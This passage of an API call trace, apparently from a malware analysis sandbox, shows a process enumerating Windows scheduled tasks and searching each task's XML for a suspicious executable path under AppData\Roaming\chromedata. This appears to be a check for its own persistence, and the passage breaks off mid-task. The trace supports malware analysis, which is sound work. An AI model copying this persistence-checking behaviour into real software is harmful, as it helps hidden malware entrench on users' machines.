	[0073.268] ITaskFolderCollection:get_Count (in: This=0x55fe10, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.269] IUnknown:Release (This=0x55fe10) returned 0x0
	[0073.269] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.269] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x14, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.269] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe60) returned 0x0
	[0073.270] IRegisteredTaskCollection:get_Count (in: This=0x55fe60, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0073.270] IRegisteredTaskCollection:get_Item (in: This=0x55fe60, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff58) returned 0x0
	[0073.270] IRegisteredTask:get_Name (in: This=0x55ff58, pName=0x128e3c | out: pName=0x128e3c*="Background Synchronization") returned 0x0
	[0073.270] IRegisteredTask:get_Xml (in: This=0x55ff58, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\cscui.dll,-5000)</Source>\r\n    <Author>$(@%systemroot%\\system32\\cscui.dll,-5001)</Author>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemroot%\\system32\\cscui.dll,-5003)</Description>\r\n    <URI>\\Microsoft\\Windows\\Offline Files\\Background Synchronization</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger>\r\n      <Repetition>\r\n        <Interval>PT360M</Interval>\r\n        <StopAtDurationEnd>false</StopAtDurationEnd>\r\n      </Repetition>\r\n      <StartBoundary>2008-01-01T00:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <RandomDelay>PT60M</RandomDelay>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>P1D</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.275] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\cscui.dll,-5000)</Source>\r\n    <Author>$(@%systemroot%\\system32\\cscui.dll,-5001)</Author>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemroot%\\system32\\cscui.dll,-5003)</Description>\r\n    <URI>\\Microsoft\\Windows\\Offline Files\\Background Synchronization</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger>\r\n      <Repetition>\r\n        <Interval>PT360M</Interval>\r\n        <StopAtDurationEnd>false</StopAtDurationEnd>\r\n      </Repetition>\r\n      <StartBoundary>2008-01-01T00:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <RandomDelay>PT60M</RandomDelay>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>P1D</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.275] IUnknown:Release (This=0x55ff58) returned 0x0
	[0073.275] IRegisteredTaskCollection:get_Item (in: This=0x55fe60, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff58) returned 0x0
	[0073.276] IRegisteredTask:get_Name (in: This=0x55ff58, pName=0x128e3c | out: pName=0x128e3c*="Logon Synchronization") returned 0x0
	[0073.276] IRegisteredTask:get_Xml (in: This=0x55ff58, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Offline Files\\Logon Synchronization</URI>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\cscui.dll,-5000)</Source>\r\n    <Author>$(@%systemroot%\\system32\\cscui.dll,-5001)</Author>\r\n    <Description>$(@%systemroot%\\system32\\cscui.dll,-5002)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT4M</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>P1D</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}</ClassId>\r\n      <Data><![CDATA[Logon]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.277] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Offline Files\\Logon Synchronization</URI>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\cscui.dll,-5000)</Source>\r\n    <Author>$(@%systemroot%\\system32\\cscui.dll,-5001)</Author>\r\n    <Description>$(@%systemroot%\\system32\\cscui.dll,-5002)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT4M</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>P1D</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}</ClassId>\r\n      <Data><![CDATA[Logon]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.278] IUnknown:Release (This=0x55ff58) returned 0x0
	[0073.278] IUnknown:Release (This=0x55fe60) returned 0x0
	[0073.278] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe60) returned 0x0
	[0073.342] ITaskFolderCollection:get_Count (in: This=0x55fe60, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.342] IUnknown:Release (This=0x55fe60) returned 0x0
	[0073.343] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.343] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x15, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.343] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe58) returned 0x0
	[0073.343] IRegisteredTaskCollection:get_Count (in: This=0x55fe58, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.343] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.343] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="BackgroundConfigSurveyor") returned 0x0
	[0073.343] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)</SecurityDescriptor>\r\n    <Author>$(@%systemRoot%\\System32\\perftrack.dll,-2003)</Author>\r\n    <Description>$(@%systemRoot%\\System32\\perftrack.dll,-2002)</Description>\r\n    <URI>Microsoft\\Windows\\PerfTrack\\BackgroundConfigSurveyor</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <IdleTrigger />\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-05-30T03:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{EA9155A3-8A39-40b4-8963-D3C761B18371}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.345] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)</SecurityDescriptor>\r\n    <Author>$(@%systemRoot%\\System32\\perftrack.dll,-2003)</Author>\r\n    <Description>$(@%systemRoot%\\System32\\perftrack.dll,-2002)</Description>\r\n    <URI>Microsoft\\Windows\\PerfTrack\\BackgroundConfigSurveyor</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <IdleTrigger />\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-05-30T03:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{EA9155A3-8A39-40b4-8963-D3C761B18371}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.345] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.345] IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.345] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe58) returned 0x0
	[0073.346] ITaskFolderCollection:get_Count (in: This=0x55fe58, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.346] IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.346] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.346] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x16, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.346] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe48) returned 0x0
	[0073.346] IRegisteredTaskCollection:get_Count (in: This=0x55fe48, pCount=0x128e30 | out: pCount=0x128e30*=0) returned 0x0
	[0073.346] IUnknown:Release (This=0x55fe48) returned 0x0
	[0073.346] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe48) returned 0x0
	[0073.347] ITaskFolderCollection:get_Count (in: This=0x55fe48, pCount=0x128e2c | out: pCount=0x128e2c*=1) returned 0x0
	[0073.347] ITaskFolderCollection:get_Item (in: This=0x55fe48, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppFolder=0x128e54 | out: ppFolder=0x128e54*=0x55ff28) returned 0x0
	[0073.347] ITaskFolder:GetTasks (in: This=0x55ff28, flags=1, ppTasks=0x128d28 | out: ppTasks=0x128d28*=0x55ffa0) returned 0x0
	[0073.347] IRegisteredTaskCollection:get_Count (in: This=0x55ffa0, pCount=0x128d18 | out: pCount=0x128d18*=0) returned 0x0
	[0073.347] IUnknown:Release (This=0x55ffa0) returned 0x0
	[0073.347] ITaskFolder:GetFolders (in: This=0x55ff28, flags=0, ppFolders=0x128d1c | out: ppFolders=0x128d1c*=0x55ffa0) returned 0x0
	[0073.347] ITaskFolderCollection:get_Count (in: This=0x55ffa0, pCount=0x128d14 | out: pCount=0x128d14*=0) returned 0x0
	[0073.347] IUnknown:Release (This=0x55ffa0) returned 0x0
	[0073.347] TaskScheduler:IUnknown:Release (This=0x55ff28) returned 0x0
	[0073.347] IUnknown:Release (This=0x55fe48) returned 0x0
	[0073.347] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.347] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x17, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.347] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe78) returned 0x0
	[0073.348] IRegisteredTaskCollection:get_Count (in: This=0x55fe78, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.348] IRegisteredTaskCollection:get_Item (in: This=0x55fe78, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff80) returned 0x0
	[0073.348] IRegisteredTask:get_Name (in: This=0x55ff80, pName=0x128e3c | out: pName=0x128e3c*="AnalyzeSystem") returned 0x0
	[0073.348] IRegisteredTask:get_Xml (in: This=0x55ff80, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeSystem</URI>\r\n    <Source>$(@%systemRoot%\\system32\\energy.dll,-101)</Source>\r\n    <Author>$(@%systemRoot%\\system32\\energy.dll,-103)</Author>\r\n    <Description>$(@%systemRoot%\\system32\\energy.dll,-102)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-01-01T06:00:00</StartBoundary>\r\n      <RandomDelay>PT8H</RandomDelay>\r\n      <ScheduleByDay>\r\n        <DaysInterval>14</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <IdleSettings>\r\n      <Duration>PT5M</Duration>\r\n      <WaitTimeout>PT2H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT5M</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\System32\\powercfg.exe</Command>\r\n      <Arguments>-energy -auto</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.349] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeSystem</URI>\r\n    <Source>$(@%systemRoot%\\system32\\energy.dll,-101)</Source>\r\n    <Author>$(@%systemRoot%\\system32\\energy.dll,-103)</Author>\r\n    <Description>$(@%systemRoot%\\system32\\energy.dll,-102)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-01-01T06:00:00</StartBoundary>\r\n      <RandomDelay>PT8H</RandomDelay>\r\n      <ScheduleByDay>\r\n        <DaysInterval>14</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <IdleSettings>\r\n      <Duration>PT5M</Duration>\r\n      <WaitTimeout>PT2H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT5M</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\System32\\powercfg.exe</Command>\r\n      <Arguments>-energy -auto</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.350] IUnknown:Release (This=0x55ff80) returned 0x0
	[0073.350] IUnknown:Release (This=0x55fe78) returned 0x0
	[0073.350] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe78) returned 0x0
	[0073.350] ITaskFolderCollection:get_Count (in: This=0x55fe78, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.350] IUnknown:Release (This=0x55fe78) returned 0x0
	[0073.350] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.350] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x18, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.350] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe48) returned 0x0
	[0073.350] IRegisteredTaskCollection:get_Count (in: This=0x55fe48, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.350] IRegisteredTaskCollection:get_Item (in: This=0x55fe48, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff20) returned 0x0
	[0073.350] IRegisteredTask:get_Name (in: This=0x55ff20, pName=0x128e3c | out: pName=0x128e3c*="RacTask") returned 0x0
	[0073.351] IRegisteredTask:get_Xml (in: This=0x55ff20, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\RacEngn.dll,-501)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\RacEngn.dll,-501)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\RacEngn.dll,-502)</Description>\r\n    <URI>Microsoft\\Windows\\RAC\\RacTask</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"RACSQMTrigger\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"Application\"&gt;&lt;Select Path=\"Application\"&gt;*[System[Provider[@Name='Microsoft-Windows-CEIP'] and EventID=1007]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n    <TimeTrigger id=\"RACTimeTrigger\">\r\n      <Repetition>\r\n        <Interval>PT1H</Interval>\r\n        <StopAtDurationEnd>false</StopAtDurationEnd>\r\n      </Repetition>\r\n      <StartBoundary>2008-03-31T00:00:00Z</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <RandomDelay>PT15M</RandomDelay>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      